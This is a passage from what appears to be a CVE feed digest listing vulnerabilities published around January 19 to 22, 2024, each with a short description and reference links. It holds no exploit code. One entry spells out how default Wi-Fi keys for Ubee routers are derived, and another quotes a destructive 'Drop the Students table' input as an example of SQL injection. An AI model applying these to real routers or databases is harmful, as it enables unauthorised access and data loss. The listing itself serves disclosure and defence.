https://duartecsantos.github.io/2023-01-02-CVE-2023-50447/ | source : cve@mitre.org
https://github.com/python-pillow/Pillow/releases | source : cve@mitre.org


Vulnerability ID : CVE-2023-50693

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
An issue in dom96 Jester v.0.6.0 and before allows a remote attacker to execute arbitrary code via a crafted request.

CVE ID : CVE-2023-50693
Source : cve@mitre.org
CVSS Score : /

References :
https://gist.github.com/anas-cherni/dd297786750f300a2bab3bb73fee919b | source : cve@mitre.org
https://github.com/dom96/jester/issues/326 | source : cve@mitre.org
https://github.com/dom96/jester/pull/327 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50694

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
An issue in dom96 HTTPbeast v.0.4.1 and before allows a remote attacker to execute arbitrary code via a crafted request to the parser.nim component.

CVE ID : CVE-2023-50694
Source : cve@mitre.org
CVSS Score : /

References :
https://gist.github.com/anas-cherni/c95e2fc1fd84d93167eb60193318d0b8 | source : cve@mitre.org
https://github.com/dom96/httpbeast/issues/95 | source : cve@mitre.org
https://github.com/dom96/httpbeast/pull/96 | source : cve@mitre.org


Vulnerability ID : CVE-2023-49329

First published on : 19-01-2024 21:15:08
Last modified on : 19-01-2024 22:52:48

Description :
Anomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate privileges, execute system commands, and potentially compromise the underlying operating system. The fixed versions are 4.4.5, 4.5.4, and 4.6.2. The earliest affected version is 4.3.

CVE ID : CVE-2023-49329
Source : cve@mitre.org
CVSS Score : /

References :
https://www.anomali.com/collaborate/ciso-blog | source : cve@mitre.org
https://www.anomali.com/security-advisory/anml-2023-01 | source : cve@mitre.org


Vulnerability ID : CVE-2021-31314

First published on : 20-01-2024 01:15:07
Last modified on : 20-01-2024 02:58:09

Description :
File upload vulnerability in ejinshan v8+ terminal security system allows attackers to upload arbitrary files to arbitrary locations on the server.

CVE ID : CVE-2021-31314
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/huahaiYa/jinshansoft/blob/main/Kingsoft%20Security%20Arbitrary%20File%20Upload%20%2B%20File%20Contains%20Vulnerabilities.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-51892

First published on : 20-01-2024 01:15:07
Last modified on : 20-01-2024 02:58:09

Description :
An issue in weaver e-cology v.10.0.2310.01 allows a remote attacker to execute arbitrary code via a crafted script to the FrameworkShellController component.

CVE ID : CVE-2023-51892
Source : cve@mitre.org
CVSS Score : /

References :
http://e-cology.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51892.txt | source : cve@mitre.org
https://www.weaver.com.cn/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51926

First published on : 20-01-2024 01:15:07
Last modified on : 20-01-2024 02:58:09

Description :
YonBIP v3_23.05 was discovered to contain an arbitrary file read vulnerability via the nc.bs.framework.comn.serv.CommonServletDispatcher component.

CVE ID : CVE-2023-51926
Source : cve@mitre.org
CVSS Score : /

References :
http://yonbip.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51926.txt | source : cve@mitre.org
https://www.yonyou.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51927

First published on : 20-01-2024 01:15:07
Last modified on : 20-01-2024 02:58:09

Description :
YonBIP v3_23.05 was discovered to contain a SQL injection vulnerability via the com.yonyou.hrcloud.attend.web.AttendScriptController.runScript() method.

CVE ID : CVE-2023-51927
Source : cve@mitre.org
CVSS Score : /

References :
http://yonbip.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51927.txt | source : cve@mitre.org
https://www.yonyou.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51928

First published on : 20-01-2024 01:15:08
Last modified on : 20-01-2024 02:58:09

Description :
An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file.

CVE ID : CVE-2023-51928
Source : cve@mitre.org
CVSS Score : /

References :
http://yonbip.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51928.txt | source : cve@mitre.org
https://www.yonyou.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-47024

First published on : 20-01-2024 02:15:07
Last modified on : 20-01-2024 02:58:09

Description :
Cross Site Request Forgery vulnerability in NCR Terminal Handler v.1.5.1 allows a remote attacker to obtain sensitive information and escalate privileges via a crafted script to the UserSelfService component.

CVE ID : CVE-2023-47024
Source : cve@mitre.org
CVSS Score : /

References :
https://docs.google.com/document/d/18EOsFghBsAme0b3Obur8Oc6h5xV9zUCNKyQLw5ERs9Q/edit?usp=sharing | source : cve@mitre.org
https://github.com/Patrick0x41/Security-Advisories/tree/main/CVE-2023-47024 | source : cve@mitre.org


Vulnerability ID : CVE-2023-51906

First published on : 20-01-2024 02:15:07
Last modified on : 20-01-2024 02:58:09

Description :
An issue in yonyou YonBIP v3_23.05 allows a remote attacker to execute arbitrary code via a crafted script to the ServiceDispatcherServlet uap.framework.rc.itf.IResourceManager component.

CVE ID : CVE-2023-51906
Source : cve@mitre.org
CVSS Score : /

References :
http://yonbip.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51906.txt | source : cve@mitre.org
https://www.yonyou.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51924

First published on : 20-01-2024 02:15:07
Last modified on : 20-01-2024 02:58:09

Description :
An arbitrary file upload vulnerability in the uap.framework.rc.itf.IResourceManager interface of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file.

CVE ID : CVE-2023-51924
Source : cve@mitre.org
CVSS Score : /

References :
http://yonbip.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51924.txt | source : cve@mitre.org
https://www.yonyou.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51925

First published on : 20-01-2024 02:15:07
Last modified on : 20-01-2024 02:58:09

Description :
An arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file.

CVE ID : CVE-2023-51925
Source : cve@mitre.org
CVSS Score : /

References :
http://yonbip.com | source : cve@mitre.org
https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about/51925.txt | source : cve@mitre.org
https://www.yonyou.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-46447

First published on : 20-01-2024 05:15:08
Last modified on : 22-01-2024 14:01:14

Description :
The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE.

CVE ID : CVE-2023-46447
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/actuator/rebel/blob/main/CWE-319.md | source : cve@mitre.org
https://play.google.com/store/apps/details?id=com.pops.pops | source : cve@mitre.org
https://popsdiabetes.com/about-us/ | source : cve@mitre.org


Vulnerability ID : CVE-2024-23725

First published on : 21-01-2024 04:15:19
Last modified on : 22-01-2024 14:01:14

Description :
Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries.

CVE ID : CVE-2024-23725
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/TryGhost/Ghost/pull/17190 | source : cve@mitre.org
https://github.com/TryGhost/Ghost/releases/tag/v5.76.0 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23726

First published on : 21-01-2024 04:15:19
Last modified on : 22-01-2024 14:01:14

Description :
Ubee DDW365 XCNDDW365 and DDW366 XCNDXW3WB devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. A remote attacker (in proximity to a Wi-Fi network) can derive the default WPA2-PSK value by observing a beacon frame. A PSK is generated by using the first six characters of the SSID and the last six of the BSSID, decrementing the last digit.

CVE ID : CVE-2024-23726
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/actuator/cve/blob/main/Ubee/CWE-1392.md | source : cve@mitre.org


Vulnerability ID : CVE-2024-23730

First published on : 21-01-2024 17:15:44
Last modified on : 22-01-2024 14:01:14

Description :
The OpenAPI and ChatGPT plugin loaders in LlamaHub (aka llama-hub) before 0.0.67 allow attackers to execute arbitrary code because safe_load is not used for YAML.

CVE ID : CVE-2024-23730
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/run-llama/llama-hub/blob/v0.0.67/CHANGELOG.md | source : cve@mitre.org
https://github.com/run-llama/llama-hub/pull/841/commits/9dc9c21a5c6d0226d1d2101c3121d4f085743d52 | source : cve@mitre.org
https://github.com/run-llama/llama-hub/releases/tag/v0.0.67 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23731

First published on : 21-01-2024 17:15:44
Last modified on : 22-01-2024 14:01:14

Description :
The OpenAPI loader in Embedchain before 0.1.57 allows attackers to execute arbitrary code, related to the openapi.py yaml.load function argument.

CVE ID : CVE-2024-23731
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/embedchain/embedchain/compare/0.1.56...0.1.57 | source : cve@mitre.org
https://github.com/embedchain/embedchain/pull/1122 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23732

First published on : 21-01-2024 17:15:44
Last modified on : 22-01-2024 14:01:14

Description :
The JSON loader in Embedchain before 0.1.57 allows a ReDoS (regular expression denial of service) via a long string to json.py.

CVE ID : CVE-2024-23732
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/embedchain/embedchain/compare/0.1.56...0.1.57 | source : cve@mitre.org
https://github.com/embedchain/embedchain/pull/1122 | source : cve@mitre.org


Vulnerability ID : CVE-2023-52353

First published on : 21-01-2024 23:15:44
Last modified on : 22-01-2024 14:01:14

Description :
An issue was discovered in Mbed TLS through 3.5.1. In mbedtls_ssl_session_reset, the maximum negotiable TLS version is mishandled. For example, if the last connection negotiated TLS 1.2, then 1.2 becomes the new maximum.

CVE ID : CVE-2023-52353
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/Mbed-TLS/mbedtls/issues/8654 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23744

First published on : 21-01-2024 23:15:44
Last modified on : 22-01-2024 14:01:09

Description :
An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions.

CVE ID : CVE-2024-23744
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/Mbed-TLS/mbedtls/issues/8694 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23750

First published on : 22-01-2024 01:15:08
Last modified on : 22-01-2024 14:01:09

Description :
MetaGPT through 0.6.4 allows the QaEngineer role to execute arbitrary code because RunCode.run_script() passes shell metacharacters to subprocess.Popen.

CVE ID : CVE-2024-23750
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/geekan/MetaGPT/issues/731 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23751

First published on : 22-01-2024 01:15:08
Last modified on : 22-01-2024 14:01:09

Description :
LlamaIndex (aka llama_index) through 0.9.34 allows SQL injection via the Text-to-SQL feature in NLSQLTableQueryEngine, SQLTableRetrieverQueryEngine, NLSQLRetriever, RetrieverQueryEngine, and PGVectorSQLQueryEngine. For example, an attacker might be able to delete this year's student records via "Drop the Students table" within English language input.

CVE ID : CVE-2024-23751
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/run-llama/llama_index/issues/9957 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23752

First published on : 22-01-2024 01:15:08
Last modified on : 22-01-2024 14:01:09

Description :
GenerateSDFPipeline in synthetic_dataframe in PandasAI (aka pandas-ai) through 1.5.17 allows attackers to trigger the generation of arbitrary Python code that is executed by SDFCodeExecutor. An attacker can create a dataframe that provides an English language specification of this Python code. NOTE: the vendor previously attempted to restrict code execution in response to a separate issue, CVE-2023-39660.

CVE ID : CVE-2024-23752
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/gventuri/pandas-ai/issues/868 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23770

First published on : 22-01-2024 04:15:07
Last modified on : 22-01-2024 14:01:09

Description :
darkhttpd through 1.15 allows local users to discover credentials (for --auth) by listing processes and their arguments.

CVE ID : CVE-2024-23770
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/emikulic/darkhttpd/commit/2b339828b2a42a5fda105ea84934957a7d23e35d | source : cve@mitre.org
https://github.com/emikulic/darkhttpd/compare/v1.14...v1.15 | source : cve@mitre.org


Vulnerability ID : CVE-2024-23771

First published on : 22-01-2024 04:15:07
Last modified on : 22-01-2024 14:01:09

Description :
darkhttpd before 1.15 uses strcmp (which is not constant time) to verify authentication, which makes it easier for remote attackers to bypass authentication via a timing side channel.

CVE ID : CVE-2024-23771
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/emikulic/darkhttpd/commit/f477619d49f3c4de9ad59bd194265a48ddc03f04 | source : cve@mitre.org
https://github.com/emikulic/darkhttpd/compare/v1.14...v1.15 | source : cve@mitre.org


Vulnerability ID : CVE-2023-47352

First published on : 22-01-2024 05:15:08
Last modified on : 22-01-2024 14:01:09

Description :
Technicolor TC8715D devices have predictable default WPA2 security passwords. An attacker who scans for SSID and BSSID values may be able to predict these passwords.

CVE ID : CVE-2023-47352
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/actuator/Technicolor/blob/main/TC8715D.png | source : cve@mitre.org
https://github.com/actuator/cve/blob/main/Technicolor/CVE-2023-47352 | source : cve@mitre.org
https://i.ebayimg.com/images/g/d4EAAOSwV01kEM26/s-l1600.jpg | source : cve@mitre.org
https://i.ebayimg.com/images/g/zp8AAOSwbNpkEM26/s-l1600.jpg | source : cve@mitre.org


Vulnerability ID : CVE-2017-20189

First published on : 22-01-2024 06:15:07
Last modified on : 22-01-2024 14:01:09

Description :
In Clojure before 1.9.0, classes can be used to construct a serialized object that executes arbitrary code upon deserialization. This is relevant if a server deserializes untrusted objects.

CVE ID : CVE-2017-20189
Source : cve@mitre.org
CVSS Score : /

References :
https://clojure.atlassian.net/browse/CLJ-2204 | source : cve@mitre.org
https://github.com/clojure/clojure/commit/271674c9b484d798484d134a5ac40a6df15d3ac3 | source : cve@mitre.org
https://github.com/frohoff/ysoserial/pull/68/files | source : cve@mitre.org
https://hackmd.io/%40fe1w0/HyefvRQKp | source : cve@mitre.org
https://security.snyk.io/vuln/SNYK-JAVA-ORGCLOJURE-5740378 | source : cve@mitre.org


Vulnerability ID : CVE-2023-52354

First published on : 22-01-2024 06:15:07
Last modified on : 22-01-2024 14:01:09

Description :
chasquid before 1.13 allows SMTP smuggling because LF-terminated lines are accepted.

CVE ID : CVE-2023-52354
Source : cve@mitre.org
CVSS Score : /

References :
https://blitiri.com.ar/p/chasquid/relnotes/#113-2023-12-24 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22895

First published on : 22-01-2024 15:15:09
Last modified on : 22-01-2024 19:10:26

Description :
DedeCMS 5.7.112 has a File Upload vulnerability via uploads/dede/module_upload.php.

CVE ID : CVE-2024-22895
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/zzq66/cve5 | source : cve@mitre.org


Vulnerability ID : CVE-2023-48118

First published on : 22-01-2024 19:15:08
Last modified on : 22-01-2024 20:28:17

Description :
SQL Injection vulnerability in Quest Analytics LLC IQCRM v.2023.9.5 allows a remote attacker to execute arbitrary code via a crafted request to the Common.svc WSDL page.

CVE ID : CVE-2023-48118
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/el-dud3rino/CVE-Disclosures/blob/main/Quest%20Analytics%20IQCRM/Proof%20of%20Concept | source : cve@mitre.org
https://github.com/el-dud3rino/CVE-Disclosures/blob/main/README.md | source : cve@mitre.org
https://www.quest-analytics.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-24135

First published on : 22-01-2024 21:15:08
Last modified on : 22-01-2024 21:15:08

Description :
Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a command injection vulnerability in the function formWriteFacMac. This vulnerability allows attackers to execute arbitrary commands via manipulation of the mac parameter.

CVE ID : CVE-2023-24135
Source : cve@mitre.org
CVSS Score : /

References :
http://eagle.com | source : cve@mitre.org
http://jensen.com | source : cve@mitre.org
https://oxnan.com/img/Pasted%20image%2020230112110814.png | source : cve@mitre.org
https://oxnan.com/posts/WriteFacMac-Command-Injection | source : cve@mitre.org


Source : apache.org

Vulnerability ID : CVE-2024-21733

First published on : 19-01-2024 11:15:08
Last modified on : 19-01-2024 15:56:26

Description :
Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.

CVE ID : CVE-2024-21733
Source : security@apache.org
CVSS Score : /

References :
http://www.openwall.com/lists/oss-security/2024/01/19/2 | source : security@apache.org
https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz | source : security@apache.org

Vulnerability : CWE-209


Source : wordfence.com

Vulnerability ID : CVE-2024-0663

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 20:15:13

Description :
Rejected reason: REJECT: This is a false positive report.

CVE ID : CVE-2024-0663
Source : security@wordfence.com
CVSS Score : /

References :


Vulnerability ID : CVE-2024-0706

First published on : 22-01-2024 15:15:08
Last modified on : 22-01-2024 15:15:08

Description :
Rejected reason: ***REJECT*** This was a false positive report.

CVE ID : CVE-2024-0706
Source : security@wordfence.com
CVSS Score : /

References :


Source : vulncheck.com

Vulnerability ID : CVE-2024-0758

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
MolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles.

CVE ID : CVE-2024-0758
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-2pwh-52h7-7j84 | source : disclosure@vulncheck.com
https://github.com/ipb-halle/MolecularFaces/security/advisories/GHSA-2pwh-52h7-7j84 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-2pwh-52h7-7j84 | source : disclosure@vulncheck.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-23679

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. A remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes.

CVE ID : CVE-2024-23679
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-4m5p-5w5w-3jcf | source : disclosure@vulncheck.com
https://github.com/enonic/xp/commit/0189975691e9e6407a9fee87006f730e84f734ff | source : disclosure@vulncheck.com
https://github.com/enonic/xp/commit/1f44674eb9ab3fbab7103e8d08067846e88bace4 | source : disclosure@vulncheck.com
https://github.com/enonic/xp/commit/2abac31cec8679074debc4f1fb69c25930e40842 | source : disclosure@vulncheck.com
https://github.com/enonic/xp/issues/9253 | source : disclosure@vulncheck.com
https://github.com/enonic/xp/security/advisories/GHSA-4m5p-5w5w-3jcf | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-4m5p-5w5w-3jcf | source : disclosure@vulncheck.com

Vulnerability : CWE-384


Vulnerability ID : CVE-2024-23680

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures.

CVE ID : CVE-2024-23680
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-55xh-53m6-936r | source : disclosure@vulncheck.com
https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-55xh-53m6-936r | source : disclosure@vulncheck.com

Vulnerability : CWE-347


Vulnerability ID : CVE-2024-23681

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Artemis Java Test Sandbox versions before 1.11.2 are vulnerable to a sandbox escape when an attacker loads untrusted libraries using System.load or System.loadLibrary. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.

CVE ID : CVE-2024-23681
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-98hq-4wmw-98w9 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/security/advisories/GHSA-98hq-4wmw-98w9 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-98hq-4wmw-98w9 | source : disclosure@vulncheck.com

Vulnerability : CWE-284


Vulnerability ID : CVE-2024-23682

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Artemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.

CVE ID : CVE-2024-23682
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-227w-wv4j-67h4 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/issues/15 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/releases/tag/1.8.0 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/security/advisories/GHSA-227w-wv4j-67h4 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-227w-wv4j-67h4 | source : disclosure@vulncheck.com

Vulnerability : CWE-501
Vulnerability : CWE-653


Vulnerability ID : CVE-2024-23683

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Artemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.

CVE ID : CVE-2024-23683
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-883x-6fch-6wjx | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/commit/af4f28a56e2fe600d8750b3b415352a0a3217392 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/issues/15#issuecomment-996449371 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/releases/tag/1.7.6 | source : disclosure@vulncheck.com
https://github.com/ls1intum/Ares/security/advisories/GHSA-883x-6fch-6wjx | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-883x-6fch-6wjx | source : disclosure@vulncheck.com


Vulnerability ID : CVE-2024-23684

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Inefficient algorithmic complexity in DecodeFromBytes function in com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application's use of this library, this may be a remote attacker.

CVE ID : CVE-2024-23684
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-fj2w-wfgv-mwq6 | source : disclosure@vulncheck.com
https://github.com/peteroupc/CBOR-Java/security/advisories/GHSA-fj2w-wfgv-mwq6 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-fj2w-wfgv-mwq6 | source : disclosure@vulncheck.com

Vulnerability : CWE-407


Vulnerability ID : CVE-2024-23685

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Hard-coded credentials in mod-remote-storage versions under 1.7.2 and from 2.0.0 to 2.0.3 allow unauthorized users to gain read access to mod-inventory-storage records including instances, holdings, items, contributor-types, and identifier-types.

CVE ID : CVE-2024-23685
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-m8v7-469p-5x89 | source : disclosure@vulncheck.com
https://github.com/folio-org/mod-remote-storage/commit/57df495f76e9aa5be9ce7ce3a65f89b6dbcbc13b | source : disclosure@vulncheck.com
https://github.com/folio-org/mod-remote-storage/security/advisories/GHSA-m8v7-469p-5x89 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-m8v7-469p-5x89 | source : disclosure@vulncheck.com
https://wiki.folio.org/x/hbMMBw | source : disclosure@vulncheck.com


Vulnerability ID : CVE-2024-23689

First published on : 19-01-2024 21:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Exposure of sensitive information in exceptions in ClickHouse's clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when 'sslkey' is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message.

CVE ID : CVE-2024-23689
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/ClickHouse/clickhouse-java/issues/1331 | source : disclosure@vulncheck.com
https://github.com/ClickHouse/clickhouse-java/pull/1334 | source : disclosure@vulncheck.com
https://github.com/ClickHouse/clickhouse-java/releases/tag/v0.4.6 | source : disclosure@vulncheck.com
https://github.com/ClickHouse/clickhouse-java/security/advisories/GHSA-g8ph-74m6-8m7r | source : disclosure@vulncheck.com
https://github.com/advisories/GHSA-g8ph-74m6-8m7r | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-g8ph-74m6-8m7r | source : disclosure@vulncheck.com

Vulnerability : CWE-209


Vulnerability ID : CVE-2024-23686

First published on : 19-01-2024 22:15:08
Last modified on : 19-01-2024 22:52:48

Description :
DependencyCheck for Maven 9.0.0 to 9.0.6, for CLI version 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file.

CVE ID : CVE-2024-23686
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-qqhq-8r2c-c3f5 | source : disclosure@vulncheck.com
https://github.com/jeremylong/DependencyCheck/security/advisories/GHSA-qqhq-8r2c-c3f5 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-qqhq-8r2c-c3f5 | source : disclosure@vulncheck.com

Vulnerability : CWE-532


Vulnerability ID : CVE-2024-23687

First published on : 19-01-2024 22:15:08
Last modified on : 19-01-2024 22:52:48

Description :
Hard-coded credentials in FOLIO mod-data-export-spring versions before 1.5.4 and from 2.0.0 to 2.0.2 allow unauthenticated users to access critical APIs, modify user data, modify configurations including single-sign-on, and manipulate fees/fines.

CVE ID : CVE-2024-23687
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/advisories/GHSA-vf78-3q9f-92g3 | source : disclosure@vulncheck.com
https://github.com/folio-org/mod-data-export-spring/commit/93aff4566bff59e30f4121b5a2bda5b0b508a446 | source : disclosure@vulncheck.com
https://github.com/folio-org/mod-data-export-spring/security/advisories/GHSA-vf78-3q9f-92g3 | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-vf78-3q9f-92g3 | source : disclosure@vulncheck.com
https://wiki.folio.org/x/hbMMBw | source : disclosure@vulncheck.com


Vulnerability ID : CVE-2024-23688

First published on : 19-01-2024 22:15:08
Last modified on : 19-01-2024 22:52:48

Description :
Consensys Discovery versions less than 0.4.5 use the same AES/GCM nonce for the entire session; the nonce should ideally be unique for every message. The node's private key isn't compromised; only the session key generated for specific peer communication is exposed.

CVE ID : CVE-2024-23688
Source : disclosure@vulncheck.com
CVSS Score : /

References :
https://github.com/ConsenSys/discovery/security/advisories/GHSA-w3hj-wr2q-x83g | source : disclosure@vulncheck.com
https://github.com/advisories/GHSA-w3hj-wr2q-x83g | source : disclosure@vulncheck.com
https://vulncheck.com/advisories/vc-advisory-GHSA-w3hj-wr2q-x83g | source : disclosure@vulncheck.com

Vulnerability : CWE-323


Source : redhat.com

Vulnerability ID : CVE-2020-36771

First published on : 22-01-2024 14:15:07
Last modified on : 22-01-2024 14:33:50

Description :
CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a command line argument. In some configurations this allows local users to view it via the process list and gain code execution as another user.

CVE ID : CVE-2020-36771
Source : secalert@redhat.com
CVSS Score : /

References :
https://blog.cloudlinux.com/cagefs-lve-wrappers-and-bsock-have-been-rolled-out-to-100 | source : secalert@redhat.com

Vulnerability : CWE-214


Vulnerability ID : CVE-2020-36772

First published on : 22-01-2024 15:15:07
Last modified on : 22-01-2024 19:10:26

Description :
CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths supplied to the sendmail proxy command. This allows local users to read and write arbitrary files outside the CageFS environment in a limited way.

CVE ID : CVE-2020-36772
Source : secalert@redhat.com
CVSS Score : /

References :
https://blog.cloudlinux.com/lve-manager-lve-stats-lve-utils-and-alt-python27-cllib-have-been-rolled-out-to-100 | source : secalert@redhat.com

Vulnerability : CWE-73


Source : dragos.com

Vulnerability ID : CVE-2022-45791

First published on : 22-01-2024 18:15:19
Last modified on : 22-01-2024 18:15:19

Description :
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.

CVE ID : CVE-2022-45791
Source : ot-cert@dragos.com
CVSS Score : /

References :


Vulnerability ID : CVE-2022-45795

